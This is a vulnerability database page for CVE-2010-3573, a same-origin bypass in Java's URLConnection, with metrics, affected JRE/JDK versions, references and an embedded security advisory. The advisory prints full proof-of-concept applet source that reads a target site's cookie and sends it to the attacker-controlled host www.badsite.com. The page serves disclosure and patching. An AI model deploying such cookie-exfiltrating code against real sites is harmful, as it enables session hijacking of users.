CVE-2010-3573 : Detail

CVE-2010-3573

21.37%V3
Network
2010-10-19
19h00 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21 and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that this is related to missing validation of request headers in the HttpURLConnection class when they are set by applets, which allows remote attackers to bypass the intended security policy.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 15288

Publication date : 2010-10-19 22h00 +00:00
Author : Roberto Suggi Liverani
EDB Verified : No

Description Security-Assessment.com discovered that a Java Applet making use of java.net.URLConnection class can be used to bypass same-of-origin (SOP) policy and domain based security controls in modern browsers when communication occurs between two domains that resolve to the same IP address. This advisory includes a Proof-of-Concept (PoC) demo and Java Applet source code. This demonstrates how the security vulnerability can be exploited to leak cookie information to an unauthorised domain, which resides on the same host IP address. Exploitation The Flash movie demo can be viewed at the following link: http://www.security-assessment.com/files/advisories/java_net_urlconnection_sop_bypass_demo.swf The Proof of Concept (PoC) demonstrates that a Cross Site Request Forgery (XSRF) attack can be leveraged by using a Java Applet which implements the java.net.URLConnection class. Traditionally, XSRF is used to force a user to perform an unwanted action on a target web site. In this case, the PoC shows that XSRF can be used to capture sensitive information such as a cookie related to a target web site. The following assumptions are made in this PoC: 1. The virtual hosts www.targetsite.net and www.badsite.com resolve to the same IP address; 2. A malicious user controls www.badsite.com web site; 3. A malicious user targets www.targetsite.net users. The following table summarises the sequence of actions shown in demo: 1 User has a valid cookie for www.targetsite.net 2 The same user visits www.badsite.com which performs a cross site forged request to www.targetsite.net . The forged request is performed by a Java Applet embedded on the malicious site. The Java Applet bypasses the Same-of- Origin policy (SOP) as an unsigned Java Applet should not be able to communica from www.badsite.com to www.targetsite.net without a crossdomain.xml policy file. 3 Java Applet performs first GET request to www.targetsite.net. At this stage, th Java Applet already controls the Cookie: header sent to www.targetsite.net through the getRequestProperty("cookie") method. This is in breach with SOP. 4 A second request is done for the purpose of the demo which leaks www.targetsite.net cookie’s to www.badsite.com via an HTTP GET request. Testing was successfully performed using Java(TM) SE Runtime Environment (build 1.6.0_21-b07) and the following browsers (all Windows XP): Mozilla Firefox 3.5.8 Opera 10.60 Internet Explorer 6.0.2900.5512 Google Chrome 5.0.375.9 Internet Explorer 8.0.6001.18702 Safari 5.0 (7533.16) MaliciousJavaApplet.java: import java.awt.*; import java.io.*; import java.net.*; public class MaliciousJavaApplet extends java.applet.Applet { TextArea messageLog = new TextArea(4, 40); public void init() { setLayout(new BorderLayout()); add("Center", messageLog); } public void start() { try { URL url = new URL("http://www.targetsite.net/default.html"); URLConnection connection; String inputLine; BufferedReader inReader; connection = url.openConnection(); connection.setAllowUserInteraction(false); connection.setDoOutput(true); messageLog.append("Request Property "+connection.getRequestProperty("cookie")+"\n"); messageLog.append("File read from URL " + url + ":\n"); inReader = new BufferedReader( new InputStreamReader(connection.getInputStream())); while (null != (inputLine = inReader.readLine())) { messageLog.append(inputLine + "\n"); } inReader.close(); messageLog.append("Request Property "+connection.getRequestProperty("cookie")+"\n"); String cookie; cookie = connection.getRequestProperty("cookie"); URL url2 = new URL("http://www.badsite.com/default.html?cookie="+cookie); URLConnection connection2; String inputLine2; BufferedReader inReader2; connection2 = url2.openConnection(); connection2.setAllowUserInteraction(false); connection2.setDoOutput(true); inReader2 = new BufferedReader( new InputStreamReader(connection2.getInputStream())); while (null != (inputLine2 = inReader2.readLine())) { messageLog.append(inputLine2 + "\n"); } inReader2.close(); } catch (IOException e) { System.err.println("Exception: " + e); } } } Solution Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory - October 2010. Security-Assessment.com recommends all users of JRE and JDK to upgrade to the latest version as soon as possible. For more information on the new release of JRE/JDK please refer to the release notes: http://www.oracle.com/technetwork/java/javase/downloads/index.html About Security-Assessment.com Security-Assessment.com is Australasia’s leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us: Web: www.security-assessment.com Email: info@security-assessment.com

Products Mentioned

Configuraton 0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Configuraton 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Configuraton 0

Sun>>Jdk >> Version To (including) 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Configuraton 0

Sun>>Jre >> Version To (including) 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

References

http://www.redhat.com/support/errata/RHSA-2010-0865.html
Tags : vendor-advisory, x_refsource_REDHAT
http://security.gentoo.org/glsa/glsa-201406-32.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.redhat.com/support/errata/RHSA-2010-0770.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0768.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.ubuntu.com/usn/USN-1010-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.redhat.com/support/errata/RHSA-2010-0987.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/44954
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2011-0880.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0873.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/42974
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/41972
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/41967
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0807.html
Tags : vendor-advisory, x_refsource_REDHAT